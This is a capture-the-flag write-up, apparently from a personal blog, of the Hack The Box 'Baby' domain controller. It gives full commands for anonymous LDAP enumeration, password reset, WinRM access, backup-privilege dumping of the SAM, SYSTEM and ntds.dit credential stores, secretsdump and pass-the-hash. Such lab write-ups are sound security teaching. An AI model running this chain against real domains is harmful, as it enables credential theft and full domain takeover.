HTB: Baby
← Back to the log
October 2, 2026·Johnytiger

HTB: Baby

An anonymous LDAP bind hands over the user list, and one account has its initial password typed into the description field. A disabled account missed by the summary turns into a shell, and the backup privilege turns that shell into the whole directory.

securityctfwriteuphacktheboxactive directorywindowsldapprivilege escalation

We kick things off with an nmap scan and can see this has an LDAP system, so let's begin enumeration.

The nmap scan showing a Windows domain controller for baby.vl, with DNS, Kerberos, LDAP, SMB, WinRM and RDP all open

Checking LDAP for active users we can get a username list going.

nxc ldap 10.129.99.131 -u '' -p '' --active-users

The anonymous LDAP query returning nine accounts, where the Teresa Bell row carries a description field stating the initial password

Two things here. The server answers an anonymous bind at all, which gives us the whole user list for free. And Teresa Bell has her initial password written into the description field, where any unauthenticated reader can see it.

That tool only shows us a summary though. Let's pull everything LDAP will give us and read it properly.

ldapsearch -x -h 10.129.99.131 -p 389 -b "DC=baby,DC=vl" -D "" -w "" "*" "+" > ldap_everything.txt

Grepping the full LDAP dump for the IT group membership, which lists a Caroline Robinson account that never appeared in the active user summary

Running through the full dump we come across a Caroline Robinson who wasn't in the list we built. She didn't show up earlier because the summary only returns enabled accounts, and group membership records her regardless. Let's test this user with the password we already have.

nxc smb 10.129.99.131 -u 'Caroline.Robinson' -p 'BabyStart123!'

The spray against that account, returning a password-must-change status rather than a plain logon failure

We get a must-change status back. That means the password is correct but expired, which is effectively a yes with an extra step. The account has never been logged into, so we can set the password ourselves.

impacket-changepasswd 'baby.vl/Caroline.Robinson:BabyStart123!@BabyDC.baby.vl' \
  -newpass 'Password123!' -protocol smb-samr

The password change completing successfully over the SAMR protocol

Now let's see if they have WinRM access.

nxc winrm baby.vl -u 'Caroline.Robinson' -p 'Password123!'

NetExec returning Pwn3d! for that account over WinRM

They do. Let's log in.

evil-winrm -i baby.vl -u Caroline.Robinson -p 'Password123!'

An Evil-WinRM session established on the domain controller

We made it into the system. Heading over to the user's desktop we find the user flag.

Reading user.txt on the desktop over Evil-WinRM, with the flag value blurred out

Now let's enumerate the account and check the privileges.

whoami /all

whoami output showing the backup and restore privileges enabled on this account

We have the backup privilege, which lets us read any file on disk regardless of its permissions. That means we can dump the registry hives.

reg save HKLM\SYSTEM C:\Users\Caroline.Robinson\Desktop\sys.hive
reg save HKLM\SAM    C:\Users\Caroline.Robinson\Desktop\sam.hive

The registry saves succeeding for the system and SAM hives, while the security hive is refused with access denied

We can't get the security one, but we have the other two. Note the forward slashes fail here; the command only works with backslashes.

The local hives alone won't give us the domain though, so we also want the directory database. That file is locked while the system is running, so we take a shadow copy of the volume and read it from there.

"set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
add volume C: alias cdrive
create
expose %cdrive% Z:" | Out-File -Encoding ascii C:\Windows\Temp\ds.txt

diskshadow /s C:\Windows\Temp\ds.txt

robocopy /b Z:\Windows\NTDS C:\Windows\Temp ntds.dit

diskshadow creating and exposing the shadow copy, then robocopy pulling the directory database out of it in backup mode

The backup flag on robocopy is what makes that copy work, since it tells the tool to use the backup privilege rather than normal file permissions. Now we download it all to Kali and run secretsdump.

impacket-secretsdump -ntds ntds.dit -system sys.hive LOCAL | tee ntds.secrets

secretsdump decrypting the directory database and printing the NTLM hash for every domain account, including the Administrator

That gives us every credential in the domain. Let's grab the Administrator hash and log in with pass-the-hash.

evil-winrm -i baby.vl -u Administrator -H '<ADMIN_NT>'

Heading over to the admin desktop we can find the root flag.

Reading root.txt on the Administrator desktop over Evil-WinRM, with the flag value blurred out

This box felt a little different, with a lot more LDAP enumeration surface. Overall it was a good one for learning to dig into LDAP for information you might have missed on the surface.

End of transmissionAll posts
Drive
Johnytiger
HTB: Baby · Johnytiger